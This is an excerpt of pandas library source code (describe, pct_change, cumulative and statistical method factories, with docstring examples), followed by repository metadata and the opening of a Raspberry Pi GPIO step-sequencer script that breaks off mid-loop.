>>> s = pd.Series([1, 2, 3])
>>> s.describe()
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Describing a categorical ``Series``.
>>> s = pd.Series(['a', 'a', 'b', 'c'])
>>> s.describe()
count 4
unique 3
top a
freq 2
dtype: object
Describing a timestamp ``Series``.
>>> s = pd.Series([
... np.datetime64("2000-01-01"),
... np.datetime64("2010-01-01"),
... np.datetime64("2010-01-01")
... ])
>>> s.describe()
count 3
unique 2
top 2010-01-01 00:00:00
freq 2
first 2000-01-01 00:00:00
last 2010-01-01 00:00:00
dtype: object
Describing a ``DataFrame``. By default only numeric fields
are returned.
>>> df = pd.DataFrame({ 'object': ['a', 'b', 'c'],
... 'numeric': [1, 2, 3],
... 'categorical': pd.Categorical(['d','e','f'])
... })
>>> df.describe()
numeric
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Describing all columns of a ``DataFrame`` regardless of data type.
>>> df.describe(include='all')
categorical numeric object
count 3 3.0 3
unique 3 NaN 3
top f NaN c
freq 1 NaN 1
mean NaN 2.0 NaN
std NaN 1.0 NaN
min NaN 1.0 NaN
25% NaN 1.5 NaN
50% NaN 2.0 NaN
75% NaN 2.5 NaN
max NaN 3.0 NaN
Describing a column from a ``DataFrame`` by accessing it as
an attribute.
>>> df.numeric.describe()
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Name: numeric, dtype: float64
Including only numeric columns in a ``DataFrame`` description.
>>> df.describe(include=[np.number])
numeric
count 3.0
mean 2.0
std 1.0
min 1.0
25% 1.5
50% 2.0
75% 2.5
max 3.0
Including only string columns in a ``DataFrame`` description.
>>> df.describe(include=[np.object])
object
count 3
unique 3
top c
freq 1
Including only categorical columns from a ``DataFrame`` description.
>>> df.describe(include=['category'])
categorical
count 3
unique 3
top f
freq 1
Excluding numeric columns from a ``DataFrame`` description.
>>> df.describe(exclude=[np.number])
categorical object
count 3 3
unique 3 3
top f c
freq 1 1
Excluding object columns from a ``DataFrame`` description.
>>> df.describe(exclude=[np.object])
categorical numeric
count 3 3.0
unique 3 NaN
top f NaN
freq 1 NaN
mean NaN 2.0
std NaN 1.0
min NaN 1.0
25% NaN 1.5
50% NaN 2.0
75% NaN 2.5
max NaN 3.0
See Also
--------
DataFrame.count
DataFrame.max
DataFrame.min
DataFrame.mean
DataFrame.std
DataFrame.select_dtypes
"""
if self.ndim >= 3:
msg = "describe is not implemented on Panel objects."
raise NotImplementedError(msg)
elif self.ndim == 2 and self.columns.size == 0:
raise ValueError("Cannot describe a DataFrame without columns")
if percentiles is not None:
# explicit conversion of `percentiles` to list
percentiles = list(percentiles)
# get them all to be in [0, 1]
self._check_percentile(percentiles)
# median should always be included
if 0.5 not in percentiles:
percentiles.append(0.5)
percentiles = np.asarray(percentiles)
else:
percentiles = np.array([0.25, 0.5, 0.75])
# sort and check for duplicates
unique_pcts = np.unique(percentiles)
if len(unique_pcts) < len(percentiles):
raise ValueError("percentiles cannot contain duplicates")
percentiles = unique_pcts
formatted_percentiles = format_percentiles(percentiles)
def describe_numeric_1d(series):
stat_index = (['count', 'mean', 'std', 'min'] +
formatted_percentiles + ['max'])
d = ([series.count(), series.mean(), series.std(), series.min()] +
[series.quantile(x) for x in percentiles] + [series.max()])
return pd.Series(d, index=stat_index, name=series.name)
def describe_categorical_1d(data):
names = ['count', 'unique']
objcounts = data.value_counts()
count_unique = len(objcounts[objcounts != 0])
result = [data.count(), count_unique]
if result[1] > 0:
top, freq = objcounts.index[0], objcounts.iloc[0]
if is_datetime64_dtype(data):
asint = data.dropna().values.view('i8')
names += ['top', 'freq', 'first', 'last']
result += [tslib.Timestamp(top), freq,
tslib.Timestamp(asint.min()),
tslib.Timestamp(asint.max())]
else:
names += ['top', 'freq']
result += [top, freq]
return pd.Series(result, index=names, name=data.name)
def describe_1d(data):
if is_bool_dtype(data):
return describe_categorical_1d(data)
elif is_numeric_dtype(data):
return describe_numeric_1d(data)
elif is_timedelta64_dtype(data):
return describe_numeric_1d(data)
else:
return describe_categorical_1d(data)
if self.ndim == 1:
return describe_1d(self)
elif (include is None) and (exclude is None):
# when some numerics are found, keep only numerics
data = self.select_dtypes(include=[np.number])
if len(data.columns) == 0:
data = self
elif include == 'all':
if exclude is not None:
msg = "exclude must be None when include is 'all'"
raise ValueError(msg)
data = self
else:
data = self.select_dtypes(include=include, exclude=exclude)
ldesc = [describe_1d(s) for _, s in data.iteritems()]
# set a convenient order for rows
names = []
ldesc_indexes = sorted([x.index for x in ldesc], key=len)
for idxnames in ldesc_indexes:
for name in idxnames:
if name not in names:
names.append(name)
d = pd.concat(ldesc, join_axes=pd.Index([names]), axis=1)
d.columns = data.columns.copy()
return d
def _check_percentile(self, q):
"""Validate percentiles (used by describe and quantile)."""
msg = ("percentiles should all be in the interval [0, 1]. "
"Try {0} instead.")
q = np.asarray(q)
if q.ndim == 0:
if not 0 <= q <= 1:
raise ValueError(msg.format(q / 100.0))
else:
if not all(0 <= qs <= 1 for qs in q):
raise ValueError(msg.format(q / 100.0))
return q
_shared_docs['pct_change'] = """
Percentage change between the current and a prior element.
Computes the percentage change from the immediately previous row by
default. This is useful in comparing the percentage of change in a time
series of elements.
Parameters
----------
periods : int, default 1
Periods to shift for forming percent change.
fill_method : str, default 'pad'
How to handle NAs before computing percent changes.
limit : int, default None
The number of consecutive NAs to fill before stopping.
freq : DateOffset, timedelta, or offset alias string, optional
Increment to use from time series API (e.g. 'M' or BDay()).
**kwargs
Additional keyword arguments are passed into
`DataFrame.shift` or `Series.shift`.
Returns
-------
chg : Series or DataFrame
The same type as the calling object.
See Also
--------
Series.diff : Compute the difference of two elements in a Series.
DataFrame.diff : Compute the difference of two elements in a DataFrame.
Series.shift : Shift the index by some number of periods.
DataFrame.shift : Shift the index by some number of periods.
Examples
--------
**Series**
>>> s = pd.Series([90, 91, 85])
>>> s
0 90
1 91
2 85
dtype: int64
>>> s.pct_change()
0 NaN
1 0.011111
2 -0.065934
dtype: float64
>>> s.pct_change(periods=2)
0 NaN
1 NaN
2 -0.055556
dtype: float64
See the percentage change in a Series where filling NAs with last
valid observation forward to next valid.
>>> s = pd.Series([90, 91, None, 85])
>>> s
0 90.0
1 91.0
2 NaN
3 85.0
dtype: float64
>>> s.pct_change(fill_method='ffill')
0 NaN
1 0.011111
2 0.000000
3 -0.065934
dtype: float64
**DataFrame**
Percentage change in French franc, Deutsche Mark, and Italian lira from
1980-01-01 to 1980-03-01.
>>> df = pd.DataFrame({
... 'FR': [4.0405, 4.0963, 4.3149],
... 'GR': [1.7246, 1.7482, 1.8519],
... 'IT': [804.74, 810.01, 860.13]},
... index=['1980-01-01', '1980-02-01', '1980-03-01'])
>>> df
FR GR IT
1980-01-01 4.0405 1.7246 804.74
1980-02-01 4.0963 1.7482 810.01
1980-03-01 4.3149 1.8519 860.13
>>> df.pct_change()
FR GR IT
1980-01-01 NaN NaN NaN
1980-02-01 0.013810 0.013684 0.006549
1980-03-01 0.053365 0.059318 0.061876
Percentage of change in GOOG and APPL stock volume. Shows computing
the percentage change between columns.
>>> df = pd.DataFrame({
... '2016': [1769950, 30586265],
... '2015': [1500923, 40912316],
... '2014': [1371819, 41403351]},
... index=['GOOG', 'APPL'])
>>> df
2016 2015 2014
GOOG 1769950 1500923 1371819
APPL 30586265 40912316 41403351
>>> df.pct_change(axis='columns')
2016 2015 2014
GOOG NaN -0.151997 -0.086016
APPL NaN 0.337604 0.012002
"""
@Appender(_shared_docs['pct_change'] % _shared_doc_kwargs)
def pct_change(self, periods=1, fill_method='pad', limit=None, freq=None,
**kwargs):
# TODO: Not sure if above is correct - need someone to confirm.
axis = self._get_axis_number(kwargs.pop('axis', self._stat_axis_name))
if fill_method is None:
data = self
else:
data = self.fillna(method=fill_method, limit=limit, axis=axis)
rs = (data.div(data.shift(periods=periods, freq=freq, axis=axis,
**kwargs)) - 1)
rs = rs.reindex_like(data)
if freq is None:
mask = isna(com._values_from_object(data))
np.putmask(rs.values, mask, np.nan)
return rs
def _agg_by_level(self, name, axis=0, level=0, skipna=True, **kwargs):
grouped = self.groupby(level=level, axis=axis, sort=False)
if hasattr(grouped, name) and skipna:
return getattr(grouped, name)(**kwargs)
axis = self._get_axis_number(axis)
method = getattr(type(self), name)
applyf = lambda x: method(x, axis=axis, skipna=skipna, **kwargs)
return grouped.aggregate(applyf)
@classmethod
def _add_numeric_operations(cls):
"""Add the operations to the cls; evaluate the doc strings again"""
axis_descr, name, name2 = _doc_parms(cls)
cls.any = _make_logical_function(
cls, 'any', name, name2, axis_descr,
_any_desc, nanops.nanany, _any_examples, _any_see_also)
cls.all = _make_logical_function(
cls, 'all', name, name2, axis_descr, _all_doc,
nanops.nanall, _all_examples, _all_see_also)
@Substitution(outname='mad',
desc="Return the mean absolute deviation of the values "
"for the requested axis",
name1=name, name2=name2, axis_descr=axis_descr,
min_count='', examples='')
@Appender(_num_doc)
def mad(self, axis=None, skipna=None, level=None):
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level('mad', axis=axis, level=level,
skipna=skipna)
data = self._get_numeric_data()
if axis == 0:
demeaned = data - data.mean(axis=0)
else:
demeaned = data.sub(data.mean(axis=1), axis=0)
return np.abs(demeaned).mean(axis=axis, skipna=skipna)
cls.mad = mad
cls.sem = _make_stat_function_ddof(
cls, 'sem', name, name2, axis_descr,
"Return unbiased standard error of the mean over requested "
"axis.\n\nNormalized by N-1 by default. This can be changed "
"using the ddof argument",
nanops.nansem)
cls.var = _make_stat_function_ddof(
cls, 'var', name, name2, axis_descr,
"Return unbiased variance over requested axis.\n\nNormalized by "
"N-1 by default. This can be changed using the ddof argument",
nanops.nanvar)
cls.std = _make_stat_function_ddof(
cls, 'std', name, name2, axis_descr,
"Return sample standard deviation over requested axis."
"\n\nNormalized by N-1 by default. This can be changed using the "
"ddof argument",
nanops.nanstd)
@Substitution(outname='compounded',
desc="Return the compound percentage of the values for "
"the requested axis", name1=name, name2=name2,
axis_descr=axis_descr,
min_count='', examples='')
@Appender(_num_doc)
def compound(self, axis=None, skipna=None, level=None):
if skipna is None:
skipna = True
return (1 + self).prod(axis=axis, skipna=skipna, level=level) - 1
cls.compound = compound
cls.cummin = _make_cum_function(
cls, 'cummin', name, name2, axis_descr, "minimum",
lambda y, axis: np.minimum.accumulate(y, axis), "min",
np.inf, np.nan, _cummin_examples)
cls.cumsum = _make_cum_function(
cls, 'cumsum', name, name2, axis_descr, "sum",
lambda y, axis: y.cumsum(axis), "sum", 0.,
np.nan, _cumsum_examples)
cls.cumprod = _make_cum_function(
cls, 'cumprod', name, name2, axis_descr, "product",
lambda y, axis: y.cumprod(axis), "prod", 1.,
np.nan, _cumprod_examples)
cls.cummax = _make_cum_function(
cls, 'cummax', name, name2, axis_descr, "maximum",
lambda y, axis: np.maximum.accumulate(y, axis), "max",
-np.inf, np.nan, _cummax_examples)
cls.sum = _make_min_count_stat_function(
cls, 'sum', name, name2, axis_descr,
'Return the sum of the values for the requested axis',
nanops.nansum, _sum_examples)
cls.mean = _make_stat_function(
cls, 'mean', name, name2, axis_descr,
'Return the mean of the values for the requested axis',
nanops.nanmean)
cls.skew = _make_stat_function(
cls, 'skew', name, name2, axis_descr,
'Return unbiased skew over requested axis\nNormalized by N-1',
nanops.nanskew)
cls.kurt = _make_stat_function(
cls, 'kurt', name, name2, axis_descr,
"Return unbiased kurtosis over requested axis using Fisher's "
"definition of\nkurtosis (kurtosis of normal == 0.0). Normalized "
"by N-1\n",
nanops.nankurt)
cls.kurtosis = cls.kurt
cls.prod = _make_min_count_stat_function(
cls, 'prod', name, name2, axis_descr,
'Return the product of the values for the requested axis',
nanops.nanprod, _prod_examples)
cls.product = cls.prod
cls.median = _make_stat_function(
cls, 'median', name, name2, axis_descr,
'Return the median of the values for the requested axis',
nanops.nanmedian)
cls.max = _make_stat_function(
cls, 'max', name, name2, axis_descr,
"""This method returns the maximum of the values in the object.
If you want the *index* of the maximum, use ``idxmax``. This is
the equivalent of the ``numpy.ndarray`` method ``argmax``.""",
nanops.nanmax)
cls.min = _make_stat_function(
cls, 'min', name, name2, axis_descr,
"""This method returns the minimum of the values in the object.
If you want the *index* of the minimum, use ``idxmin``. This is
the equivalent of the ``numpy.ndarray`` method ``argmin``.""",
nanops.nanmin)
@classmethod
def _add_series_only_operations(cls):
"""Add the series only operations to the cls; evaluate the doc
strings again.
"""
axis_descr, name, name2 = _doc_parms(cls)
def nanptp(values, axis=0, skipna=True):
nmax = nanops.nanmax(values, axis, skipna)
nmin = nanops.nanmin(values, axis, skipna)
return nmax - nmin
cls.ptp = _make_stat_function(
cls, 'ptp', name, name2, axis_descr,
"""Returns the difference between the maximum value and the
minimum value in the object. This is the equivalent of the
``numpy.ndarray`` method ``ptp``.""",
nanptp)
@classmethod
def _add_series_or_dataframe_operations(cls):
"""Add the series or dataframe only operations to the cls; evaluate
the doc strings again.
"""
from pandas.core import window as rwindow
@Appender(rwindow.rolling.__doc__)
def rolling(self, window, min_periods=None, center=False,
win_type=None, on=None, axis=0, closed=None):
axis = self._get_axis_number(axis)
return rwindow.rolling(self, window=window,
min_periods=min_periods,
center=center, win_type=win_type,
on=on, axis=axis, closed=closed)
cls.rolling = rolling
@Appender(rwindow.expanding.__doc__)
def expanding(self, min_periods=1, center=False, axis=0):
axis = self._get_axis_number(axis)
return rwindow.expanding(self, min_periods=min_periods,
center=center, axis=axis)
cls.expanding = expanding
@Appender(rwindow.ewm.__doc__)
def ewm(self, com=None, span=None, halflife=None, alpha=None,
min_periods=0, adjust=True, ignore_na=False,
axis=0):
axis = self._get_axis_number(axis)
return rwindow.ewm(self, com=com, span=span, halflife=halflife,
alpha=alpha, min_periods=min_periods,
adjust=adjust, ignore_na=ignore_na, axis=axis)
cls.ewm = ewm
@Appender(_shared_docs['transform'] % _shared_doc_kwargs)
def transform(self, func, *args, **kwargs):
result = self.agg(func, *args, **kwargs)
if is_scalar(result) or len(result) != len(self):
raise ValueError("transforms cannot produce "
"aggregated results")
return result
cls.transform = transform
# ----------------------------------------------------------------------
# Misc methods
_shared_docs['valid_index'] = """
Return index for %(position)s non-NA/null value.
Notes
--------
If all elements are non-NA/null, returns None.
Also returns None for empty %(klass)s.
Returns
--------
scalar : type of index
"""
def _doc_parms(cls):
"""Return a tuple of the doc parms."""
axis_descr = "{%s}" % ', '.join(["{0} ({1})".format(a, i)
for i, a in enumerate(cls._AXIS_ORDERS)])
name = (cls._constructor_sliced.__name__
if cls._AXIS_LEN > 1 else 'scalar')
name2 = cls.__name__
return axis_descr, name, name2
_num_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
skipna : boolean, default True
Exclude NA/null values when computing the result.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s
numeric_only : boolean, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
%(min_count)s\
Returns
-------
%(outname)s : %(name1)s or %(name2)s (if level specified)
%(examples)s"""
_num_ddof_doc = """
%(desc)s
Parameters
----------
axis : %(axis_descr)s
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations is N - ddof,
where N represents the number of elements.
numeric_only : boolean, default None
Include only float, int, boolean columns. If None, will attempt to use
everything, then use only numeric data. Not implemented for Series.
Returns
-------
%(outname)s : %(name1)s or %(name2)s (if level specified)\n"""
_bool_doc = """
%(desc)s
Parameters
----------
axis : int, default 0
Select the axis which can be 0 for indices and 1 for columns.
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a %(name1)s.
bool_only : boolean, default None
Include only boolean columns. If None, will attempt to use everything,
then use only boolean data. Not implemented for Series.
**kwargs : any, default None
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(outname)s : %(name1)s or %(name2)s (if level specified)
%(see_also)s
%(examples)s"""
_all_doc = """\
Return whether all elements are True over series or dataframe axis.
Returns True if all elements within a series or along a dataframe
axis are non-zero, not-empty or not-False."""
_all_examples = """\
Examples
--------
Series
>>> pd.Series([True, True]).all()
True
>>> pd.Series([True, False]).all()
False
Dataframes
Create a dataframe from a dictionary.
>>> df = pd.DataFrame({'col1': [True, True], 'col2': [True, False]})
>>> df
col1 col2
0 True True
1 True False
Default behaviour checks if column-wise values all return True.
>>> df.all()
col1 True
col2 False
dtype: bool
Adding axis=1 argument will check if row-wise values all return True.
>>> df.all(axis=1)
0 True
1 False
dtype: bool
"""
_all_see_also = """\
See also
--------
pandas.Series.all : Return True if all elements are True
pandas.DataFrame.any : Return True if one (or more) elements are True
"""
_cnum_doc = """
Return cumulative %(desc)s over a DataFrame or Series axis.
Returns a DataFrame or Series of the same size containing the cumulative
%(desc)s.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The index or the name of the axis. 0 is equivalent to None or 'index'.
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
*args, **kwargs :
Additional keywords have no effect but might be accepted for
compatibility with NumPy.
Returns
-------
%(outname)s : %(name1)s or %(name2)s\n
%(examples)s
See also
--------
pandas.core.window.Expanding.%(accum_func_name)s : Similar functionality
but ignores ``NaN`` values.
%(name2)s.%(accum_func_name)s : Return the %(desc)s over
%(name2)s axis.
%(name2)s.cummax : Return cumulative maximum over %(name2)s axis.
%(name2)s.cummin : Return cumulative minimum over %(name2)s axis.
%(name2)s.cumsum : Return cumulative sum over %(name2)s axis.
%(name2)s.cumprod : Return cumulative product over %(name2)s axis.
"""
_cummin_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummin()
0 2.0
1 NaN
2 2.0
3 -1.0
4 -1.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummin(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the minimum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummin()
A B
0 2.0 1.0
1 2.0 NaN
2 1.0 0.0
To iterate over columns and find the minimum in each row,
use ``axis=1``
>>> df.cummin(axis=1)
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
"""
_cumsum_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumsum()
0 2.0
1 NaN
2 7.0
3 6.0
4 6.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumsum(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the sum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumsum()
A B
0 2.0 1.0
1 5.0 NaN
2 6.0 1.0
To iterate over columns and find the sum in each row,
use ``axis=1``
>>> df.cumsum(axis=1)
A B
0 2.0 3.0
1 3.0 NaN
2 1.0 1.0
"""
_cumprod_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cumprod()
0 2.0
1 NaN
2 10.0
3 -10.0
4 -0.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cumprod(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the product
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cumprod()
A B
0 2.0 1.0
1 6.0 NaN
2 6.0 0.0
To iterate over columns and find the product in each row,
use ``axis=1``
>>> df.cumprod(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 0.0
"""
_cummax_examples = """\
Examples
--------
**Series**
>>> s = pd.Series([2, np.nan, 5, -1, 0])
>>> s
0 2.0
1 NaN
2 5.0
3 -1.0
4 0.0
dtype: float64
By default, NA values are ignored.
>>> s.cummax()
0 2.0
1 NaN
2 5.0
3 5.0
4 5.0
dtype: float64
To include NA values in the operation, use ``skipna=False``
>>> s.cummax(skipna=False)
0 2.0
1 NaN
2 NaN
3 NaN
4 NaN
dtype: float64
**DataFrame**
>>> df = pd.DataFrame([[2.0, 1.0],
... [3.0, np.nan],
... [1.0, 0.0]],
... columns=list('AB'))
>>> df
A B
0 2.0 1.0
1 3.0 NaN
2 1.0 0.0
By default, iterates over rows and finds the maximum
in each column. This is equivalent to ``axis=None`` or ``axis='index'``.
>>> df.cummax()
A B
0 2.0 1.0
1 3.0 NaN
2 3.0 1.0
To iterate over columns and find the maximum in each row,
use ``axis=1``
>>> df.cummax(axis=1)
A B
0 2.0 2.0
1 3.0 NaN
2 1.0 1.0
"""
_any_see_also = """\
See Also
--------
pandas.DataFrame.all : Return whether all elements are True.
"""
_any_desc = """\
Return whether any element is True over requested axis.
Unlike :meth:`DataFrame.all`, this performs an *or* operation. If any of the
values along the specified axis is True, this will return True."""
_any_examples = """\
Examples
--------
**Series**
For Series input, the output is a scalar indicating whether any element
is True.
>>> pd.Series([True, False]).any()
True
**DataFrame**
Whether each column contains at least one True element (the default).
>>> df = pd.DataFrame({"A": [1, 2], "B": [0, 2], "C": [0, 0]})
>>> df
A B C
0 1 0 0
1 2 2 0
>>> df.any()
A True
B True
C False
dtype: bool
Aggregating over the columns.
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 2]})
>>> df
A B
0 True 1
1 False 2
>>> df.any(axis='columns')
0 True
1 True
dtype: bool
>>> df = pd.DataFrame({"A": [True, False], "B": [1, 0]})
>>> df
A B
0 True 1
1 False 0
>>> df.any(axis='columns')
0 True
1 False
dtype: bool
`any` for an empty DataFrame is an empty Series.
>>> pd.DataFrame([]).any()
Series([], dtype: bool)
"""
_sum_examples = """\
Examples
--------
By default, the sum of an empty or all-NA Series is ``0``.
>>> pd.Series([]).sum() # min_count=0 is the default
0.0
This can be controlled with the ``min_count`` parameter. For example, if
you'd like the sum of an empty series to be NaN, pass ``min_count=1``.
>>> pd.Series([]).sum(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).sum()
0.0
>>> pd.Series([np.nan]).sum(min_count=1)
nan
"""
_prod_examples = """\
Examples
--------
By default, the product of an empty or all-NA Series is ``1``
>>> pd.Series([]).prod()
1.0
This can be controlled with the ``min_count`` parameter
>>> pd.Series([]).prod(min_count=1)
nan
Thanks to the ``skipna`` parameter, ``min_count`` handles all-NA and
empty series identically.
>>> pd.Series([np.nan]).prod()
1.0
>>> pd.Series([np.nan]).prod(min_count=1)
nan
"""
_min_count_stub = """\
min_count : int, default 0
The required number of valid values to perform the operation. If fewer than
``min_count`` non-NA values are present the result will be NA.
.. versionadded :: 0.22.0
Added with the default being 0. This means the sum of an all-NA
or empty Series is 0, and the product of an all-NA or empty
Series is 1.
"""
def _make_min_count_stat_function(cls, name, name1, name2, axis_descr, desc,
f, examples):
@Substitution(outname=name, desc=desc, name1=name1, name2=name2,
axis_descr=axis_descr, min_count=_min_count_stub,
examples=examples)
@Appender(_num_doc)
def stat_func(self, axis=None, skipna=None, level=None, numeric_only=None,
min_count=0,
**kwargs):
nv.validate_stat_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(name, axis=axis, level=level,
skipna=skipna, min_count=min_count)
return self._reduce(f, name, axis=axis, skipna=skipna,
numeric_only=numeric_only, min_count=min_count)
return set_function_name(stat_func, name, cls)
def _make_stat_function(cls, name, name1, name2, axis_descr, desc, f):
@Substitution(outname=name, desc=desc, name1=name1, name2=name2,
axis_descr=axis_descr, min_count='', examples='')
@Appender(_num_doc)
def stat_func(self, axis=None, skipna=None, level=None, numeric_only=None,
**kwargs):
nv.validate_stat_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(name, axis=axis, level=level,
skipna=skipna)
return self._reduce(f, name, axis=axis, skipna=skipna,
numeric_only=numeric_only)
return set_function_name(stat_func, name, cls)
def _make_stat_function_ddof(cls, name, name1, name2, axis_descr, desc, f):
@Substitution(outname=name, desc=desc, name1=name1, name2=name2,
axis_descr=axis_descr)
@Appender(_num_ddof_doc)
def stat_func(self, axis=None, skipna=None, level=None, ddof=1,
numeric_only=None, **kwargs):
nv.validate_stat_ddof_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
return self._agg_by_level(name, axis=axis, level=level,
skipna=skipna, ddof=ddof)
return self._reduce(f, name, axis=axis, numeric_only=numeric_only,
skipna=skipna, ddof=ddof)
return set_function_name(stat_func, name, cls)
def _make_cum_function(cls, name, name1, name2, axis_descr, desc,
accum_func, accum_func_name, mask_a, mask_b, examples):
@Substitution(outname=name, desc=desc, name1=name1, name2=name2,
axis_descr=axis_descr, accum_func_name=accum_func_name,
examples=examples)
@Appender(_cnum_doc)
def cum_func(self, axis=None, skipna=True, *args, **kwargs):
skipna = nv.validate_cum_func_with_skipna(skipna, args, kwargs, name)
if axis is None:
axis = self._stat_axis_number
else:
axis = self._get_axis_number(axis)
y = com._values_from_object(self).copy()
if (skipna and
issubclass(y.dtype.type, (np.datetime64, np.timedelta64))):
result = accum_func(y, axis)
mask = isna(self)
np.putmask(result, mask, tslib.iNaT)
elif skipna and not issubclass(y.dtype.type, (np.integer, np.bool_)):
mask = isna(self)
np.putmask(y, mask, mask_a)
result = accum_func(y, axis)
np.putmask(result, mask, mask_b)
else:
result = accum_func(y, axis)
d = self._construct_axes_dict()
d['copy'] = False
return self._constructor(result, **d).__finalize__(self)
return set_function_name(cum_func, name, cls)
def _make_logical_function(cls, name, name1, name2, axis_descr, desc, f,
examples, see_also):
@Substitution(outname=name, desc=desc, name1=name1, name2=name2,
axis_descr=axis_descr, examples=examples, see_also=see_also)
@Appender(_bool_doc)
def logical_func(self, axis=None, bool_only=None, skipna=None, level=None,
**kwargs):
nv.validate_logical_func(tuple(), kwargs, fname=name)
if skipna is None:
skipna = True
if axis is None:
axis = self._stat_axis_number
if level is not None:
if bool_only is not None:
raise NotImplementedError("Option bool_only is not "
"implemented with option level.")
return self._agg_by_level(name, axis=axis, level=level,
skipna=skipna)
return self._reduce(f, axis=axis, skipna=skipna,
numeric_only=bool_only, filter_type='bool',
name=name)
return set_function_name(logical_func, name, cls)
# install the indexes
for _name, _indexer in indexing.get_indexers_list():
NDFrame._create_indexer(_name, _indexer)
| 34.528833
| 102
| 0.531664
|
4a0595ecf104c35dd89de5d5f675d93575f6480f
| 7,411
|
py
|
Python
|
step.py
|
andrewpo456/pi-thrum
|
dcbb3576bdff7784ce6ad04e554209593db73e3e
|
[
"MIT"
] | 11
|
2017-11-01T01:21:37.000Z
|
2021-12-05T15:20:19.000Z
|
step.py
|
andrewpo456/pi-thrum
|
dcbb3576bdff7784ce6ad04e554209593db73e3e
|
[
"MIT"
] | null | null | null |
step.py
|
andrewpo456/pi-thrum
|
dcbb3576bdff7784ce6ad04e554209593db73e3e
|
[
"MIT"
] | 1
|
2020-11-05T18:03:08.000Z
|
2020-11-05T18:03:08.000Z
|
"""
This module defines the functionality behind running the 12-step sequencer.
For information regarding the circuit setup please refer to 'pi-thrum-schem'.
@author Andrew Pope
"""
import RPi.GPIO as GPIO
import pygame
import time
class Step:
# Map the GPIO pins to each button
# Note:
# * Buttons 0 - 5, play sound AND are used as part of the step seq
# * Buttons 6 - 11, are for the step seq only
__soundBNTs = [ 4, 18, 17, 27, 22, 23 ]
__stepBNTs = [ 24, 25, 5, 6, 12, 13 ]
__stepChannels = [ 4, 18, 17, 27, 22, 23, 24, 25, 5, 6, 12, 13 ]
__playBNT = 19
__recBNT = 16
__LED = 26
def __init__(self, verbose=False, bpm=120000.0):
"""
Initialise class variables, GPIO, and sound
@param verbose - True for verbose print statements
@param bpm - Beats per minute
"""
# Initialise class variables
self.__verbose = verbose
self.__playSteps = False
self.__recording = False
self.__bpm = bpm
self.__stepTime = 15000.0 / bpm
self.__stepPatterns = []
self.__samples = []
self.__currSamp = None
# Initialise pattern for each step (i.e. what sounds will play)
for i in range(12):
self.__stepPatterns.append([None])
# Initialise GPIO and sound samples
self.__GPIOInit()
self.__soundInit()
def run(self):
"""
Runs the main program (step-sequencer) when invoked
"""
# Initialise callbacks - which will start multi-threading
self.__initCBs()
step = -1
next_time = time.time()
# Begin main loop - will halt when user supplies CTRL+C
while True:
if self.__playSteps:
if time.time() >= next_time:
